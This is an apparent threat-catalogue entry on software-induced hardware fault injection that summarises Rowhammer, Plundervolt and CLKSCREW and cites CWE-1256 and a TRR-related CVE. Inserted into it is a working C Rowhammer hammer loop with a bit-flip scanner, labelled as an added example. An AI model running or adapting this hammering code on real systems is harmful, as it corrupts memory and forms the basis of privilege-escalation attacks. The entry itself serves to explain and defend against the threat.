TID-110: Hardware Fault Injection – Data Manipulation
Threat Description
Certain software-executed attacks can introduce a fault into the physical hardware of a device, leading to greater access or exploit opportunities. Typically these attacks perform a software action that produces a predictable and controllable reaction in hardware. If that hardware reaction has properties that allow a fault to occur, the threat actor can inject the fault from software alone and attempt to leverage it into an exploit.
For example, the Rowhammer exploit demonstrates how repeated dynamic random access memory (DRAM) accesses can lead to privilege escalation. The exploit is possible because DRAM rows are packed very close together and an attacker can, from software, repeatedly activate the same physical row; the accesses must bypass the CPU cache (for instance with a cache-flush instruction) so that each one actually reaches DRAM. The repeated activations cause electrical charge to leak from the cells of neighbouring rows, altering the values they hold and therefore the contents of memory itself. By flipping bits in security-relevant data such as page-table entries, the threat actor may be able to escalate privileges on a device or otherwise bypass security controls.
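The hammering loop that the paragraph above describes, written out as an added example (this is not code from the original page or from the Rowhammer papers; helper names such as hammer_pair, find_bit_flips and hammer_and_count are hypothetical). It shows the two ingredients the attack needs from software: repeated reads of the same physical locations, and a cache-line flush after every read so that each access reaches DRAM instead of being served from the cache. It does not attempt to reverse the memory controller's address mapping, so the two aggressor addresses are only assumed, not guaranteed, to sit in different rows of the same bank; on ECC memory, on a module whose TRR works, or with a poorly chosen address pair it reports zero flips.

```c
/* Added example: the core of a Rowhammer "hammer" loop plus a bit-flip check.
 * Not code from the original page or from any of the cited papers; the helper
 * names are hypothetical. The two aggressor addresses are simply `stride`
 * bytes apart; a real attack must pick addresses that map to different rows
 * of the same DRAM bank, which needs physical addresses and the memory
 * controller's mapping function. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <immintrin.h>
/* Evict one cache line so the next read of it goes to DRAM. */
static inline void flush_line(const volatile void *p) { _mm_clflush((const void *)p); }
static inline void mem_fence(void) { _mm_mfence(); }
#elif defined(__aarch64__)
static inline void flush_line(const volatile void *p) {
    __asm__ volatile("dc civac, %0" : : "r"(p) : "memory");
}
static inline void mem_fence(void) { __asm__ volatile("dsb sy" : : : "memory"); }
#else
/* Unknown architecture: no flush available, so the loop below only hits the cache. */
static inline void flush_line(const volatile void *p) { (void)p; }
static inline void mem_fence(void) {}
#endif

#define LINE 64  /* cache line size assumed for the flush loops */

/* Read both aggressors `iters` times. The flush after each read is what turns
 * the loop into repeated DRAM row activations instead of cache hits. */
void hammer_pair(volatile uint8_t *a, volatile uint8_t *b, uint64_t iters)
{
    for (uint64_t i = 0; i < iters; i++) {
        (void)*a;
        (void)*b;
        flush_line(a);
        flush_line(b);
        mem_fence();
    }
}

/* Compare `len` bytes against the fill pattern. Records up to `max` flipped
 * bit positions (byte offset * 8 + bit index) and returns the total count. */
size_t find_bit_flips(const uint8_t *buf, size_t len, uint8_t pattern,
                      size_t *positions, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned diff = buf[i] ^ pattern;
        while (diff) {
            if (n < max) positions[n] = i * 8 + (size_t)__builtin_ctz(diff);
            n++;
            diff &= diff - 1;  /* clear lowest set bit */
        }
    }
    return n;
}

/* Fill a buffer, hammer two addresses `stride` bytes apart, and return how
 * many bits anywhere in the buffer changed. Zero is the expected result on
 * ECC memory, on DRAM whose TRR works, or when the two addresses do not share
 * a bank. */
size_t hammer_and_count(size_t buf_len, size_t stride, uint64_t iters, uint8_t pattern)
{
    if (stride + LINE > buf_len) return 0;
    uint8_t *buf = malloc(buf_len);
    if (!buf) return 0;
    memset(buf, pattern, buf_len);
    /* Push the whole buffer out of the cache so the victim rows live in DRAM. */
    for (size_t i = 0; i < buf_len; i += LINE) flush_line(buf + i);
    mem_fence();
    hammer_pair(buf, buf + stride, iters);
    /* Flush again so the comparison reads what DRAM actually holds now. */
    for (size_t i = 0; i < buf_len; i += LINE) flush_line(buf + i);
    mem_fence();
    size_t flips = find_bit_flips(buf, buf_len, pattern, NULL, 0);
    free(buf);
    return flips;
}

int main(void)
{
    /* 16 MiB buffer, aggressors 8 KiB apart, a few million hammer rounds. */
    size_t flips = hammer_and_count((size_t)16 << 20, 8192, 5000000, 0xFF);
    printf("bit flips observed: %zu\n", flips);
    return 0;
}
```

The fill-hammer-scan pattern in hammer_and_count is also the shape of a defensive susceptibility test: screening a DRAM module means writing a known pattern, hammering many address pairs, and scanning for changes, which is why the flip scanner reports positions rather than just a count.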
Another example is the Plundervolt exploit. Here researchers showed that privileged software can lower the processor core's supply voltage through the CPU's own undervolting interface while a secure enclave (Intel SGX) is computing, to the point of introducing a fault into the processor itself. They leveraged this fault into a set of exploits: corrupting cryptographic signatures through voltage variability, extracting cryptographic keys with differential fault analysis, and introducing memory-safety vulnerabilities into otherwise bug-free enclave code.
Threat Maturity and Evidence
Proof of Concept
RowHammer
In 2014 and thereafter, researchers demonstrated the ability to corrupt data in nearby DDR3 and, later, DDR4 DRAM rows by repeatedly accessing the same row. This phenomenon has been turned into working exploits by various means, including flipping bits in page-table entries to gain access to arbitrary physical memory.
Plundervolt
In 2020, researchers demonstrated the ability to introduce and exploit faults in Intel's SGX secure enclave through voltage manipulation. By carefully inducing faults and measuring the output, they showed that they could corrupt signature-based integrity checks, extract encryption keys through differential fault analysis, and introduce exploitable memory-safety issues into bug-free code. The exploit requires privileged (root or kernel) software access to the voltage-control interface; it does not, however, require any physical access to the machine.
CLKSCREW
In 2017, researchers demonstrated that it was possible to manipulate the voltage and frequency of the cores of an ARM system-on-chip through the platform's own energy-management interfaces (Dynamic Voltage and Frequency Scaling, DVFS) to introduce hardware faults from software. They then leveraged these faults to corrupt bits in a way that allowed them to exploit the machine, including extracting secret AES keys from the trusted execution environment. For example, by inducing a fault at the right moment in the RSA operation that verifies a signature, they corrupted the decrypted value so that malicious code passed the trusted environment's signed-hash check and was loaded.
CWE
- CWE-1256: Improper Restriction of Software Interfaces to Hardware Interfaces
“The product provides software-controllable device functionality for capabilities such as power and clock management, but it does not properly limit functionality that can lead to modification of hardware memory or register bits, or the ability to observe physical side channels.”
CVE
- CVE-2021-42144
“Modern DRAM devices (PC-DDR4, LPDDR4X) are affected by a vulnerability in their internal Target Row Refresh (TRR) mitigation against Rowhammer attacks.”